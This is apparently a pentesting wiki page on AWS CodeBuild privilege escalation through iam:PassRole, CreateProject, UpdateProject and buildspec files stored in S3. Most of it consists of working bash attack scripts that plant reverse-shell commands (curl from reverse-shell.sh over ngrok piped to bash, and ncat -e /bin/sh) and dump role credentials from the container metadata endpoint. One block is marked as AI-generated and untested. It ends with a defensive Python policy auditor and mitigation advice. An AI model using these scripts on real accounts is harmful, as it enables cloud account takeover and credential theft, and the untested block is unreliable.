An attacker with the iam:PassRole, codebuild:CreateProject, and codebuild:StartBuild or codebuild:StartBuildBatch permissions would be able to escalate privileges to any CodeBuild IAM role by creating a project that uses it.

```bash
# Enumerate the env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"aws/codebuild/standard:1.0\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project
```

```bash
# Generated by AI, not tested

# Create a buildspec.yml file with reverse shell command
echo 'version: 0.2
phases:
  build:
    commands:
      - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml

# Upload the buildspec to the bucket and give access to everyone
aws s3 cp buildspec.yml s3://<S3_BUCKET_NAME>/buildspec.yml

# Create a new CodeBuild project with the buildspec.yml file
aws codebuild create-project --name reverse-shell-project --source type=S3,location=<S3_BUCKET_NAME>/buildspec.yml --artifacts type=NO_ARTIFACTS --environment computeType=BUILD_GENERAL1_SMALL,image=aws/codebuild/standard:5.0,type=LINUX_CONTAINER --service-role <YOUR_HIGH_PRIVILEGE_ROLE_ARN> --timeout-in-minutes 60

# Start a build with the new project
aws codebuild start-build --project-name reverse-shell-project
```
Potential Impact: Direct privesc to any AWS CodeBuild role.

Inside the CodeBuild container, the file /codebuild/output/tmp/env.sh gathers all the environment variables needed to access the metadata credentials.

This file contains the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which holds the URL path used to fetch the credentials. It will be something like /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Append that to the URL http://169.254.170.2/ and you will be able to dump the role's credentials.

Moreover, it also contains the environment variable ECS_CONTAINER_METADATA_URI, which holds the full URL for retrieving metadata about the container.
As in the previous section, instead of creating a build project you can modify an existing one: you can indicate the IAM Role and steal the token.

```bash
REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate the env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"aws/codebuild/standard:1.0\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH
aws codebuild start-build --project-name codebuild-demo-project
```

Potential Impact: Direct privesc to any AWS CodeBuild role.

As in the previous section but without the iam:PassRole permission, you can abuse these permissions to modify existing CodeBuild projects and gain access to the role they already have attached.
```bash
REV_PATH="/tmp/codebuild_pwn.json"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"codebuild_lab_3_project\",
\"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
},
\"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\",
    \"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

printf "$JSON" > $REV_PATH

# Note how an image from the AWS public ECR is used instead of Docker Hub, as Docker Hub rate-limits CodeBuild!
aws codebuild update-project --cli-input-json file://$REV_PATH
aws codebuild start-build-batch --project-name codebuild_lab_3_project
```

```bash
REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate the env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
    \"type\": \"NO_SOURCE\",
    \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
    \"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
    \"type\": \"LINUX_CONTAINER\",
    \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
    \"computeType\": \"BUILD_GENERAL1_SMALL\",
    \"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how an image from the AWS public ECR is used instead of Docker Hub, as Docker Hub rate-limits CodeBuild!
printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH
aws codebuild start-build --project-name codebuild-demo-project
```

Potential Impact: Direct privesc to the attached AWS CodeBuild roles.
SSM
With enough permissions to start an SSM session, it is possible to get inside a CodeBuild project while it is being built.

An attacker who can start or restart the build of a specific CodeBuild project whose buildspec.yml file is stored in an S3 bucket the attacker has write access to can obtain command execution in the CodeBuild process.

Note: this escalation is only useful if the CodeBuild worker has a different, hopefully more privileged, role than the attacker's.
You can use something like this buildspec to get a reverse shell:

```bash
aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./
vim ./buildspec.yml
# Add the following lines in the "phases > pre_build > commands" section
## - apt-get install nmap -y
# - ncat <IP> <PORT> -e /bin/sh
aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml
aws codebuild start-build --project-name <project-name>
# Wait for the reverse shell :)
```

Impact: Direct privesc to the role used by the AWS CodeBuild worker, which usually has high privileges.

Please note that the buildspec might be expected in zip format, so the attacker would need to download it, unzip it, edit the buildspec.yml in the root directory, zip it again and upload it.
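To audit for the three permission combinations this page describes (PassRole + CreateProject + StartBuild, UpdateProject + StartBuild on an existing project, and write access to the buildspec bucket + StartBuild), the following added example (not from the original page) evaluates an IAM policy document offline and reports which escalation paths its Allow statements make possible. It is a coarse triage: Resource and Condition elements are ignored, only explicit Deny on the action is honoured, and the sample policy is constructed for the demonstration.

```python
import fnmatch
import json

# Each path is a list of requirements; each requirement lists acceptable alternatives.
PRIVESC_PATHS = {
    "create-project-with-passrole": [["iam:PassRole"], ["codebuild:CreateProject"],
                                     ["codebuild:StartBuild", "codebuild:StartBuildBatch"]],
    "update-existing-project": [["codebuild:UpdateProject"],
                                ["codebuild:StartBuild", "codebuild:StartBuildBatch"]],
    "overwrite-buildspec-in-s3": [["s3:PutObject"],
                                  ["codebuild:StartBuild", "codebuild:StartBuildBatch"]],
}

def action_patterns(policy, effect):
    """Collect action patterns from statements with the given Effect (Allow/Deny)."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    patterns = set()
    for stmt in statements:
        if stmt.get("Effect") == effect:
            acts = stmt.get("Action", [])
            patterns.update([acts] if isinstance(acts, str) else acts)
    return patterns

def is_allowed(action, allow, deny):
    """IAM-style evaluation on actions only: an explicit Deny beats any Allow.
    Assumption: Resource and Condition are ignored, so this over-approximates."""
    match = lambda pats: any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in pats)
    return match(allow) and not match(deny)

def find_privesc_paths(policy):
    """Return the names of the CodeBuild privesc paths the policy makes possible."""
    allow, deny = action_patterns(policy, "Allow"), action_patterns(policy, "Deny")
    return sorted(name for name, reqs in PRIVESC_PATHS.items()
                  if all(any(is_allowed(a, allow, deny) for a in alts) for alts in reqs))

# Constructed sample: PassRole is explicitly denied, so creating a project with a
# chosen role is blocked, but modifying an existing project and running it is not.
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["codebuild:UpdateProject", "codebuild:StartBuild*",
                                   "iam:PassRole", "logs:*"], "Resource": "*"},
    {"Effect": "Deny", "Action": "iam:PassRole", "Resource": "*"}
  ]
}""")

if __name__ == "__main__":
    print(find_privesc_paths(SAMPLE_POLICY))
```

A hit on any path means the principal can run arbitrary commands under a CodeBuild service role, so the mitigation is to scope UpdateProject/StartBuild to specific project ARNs, restrict iam:PassRole with a Condition on iam:PassedToService and the role ARN, and protect the buildspec bucket from writes.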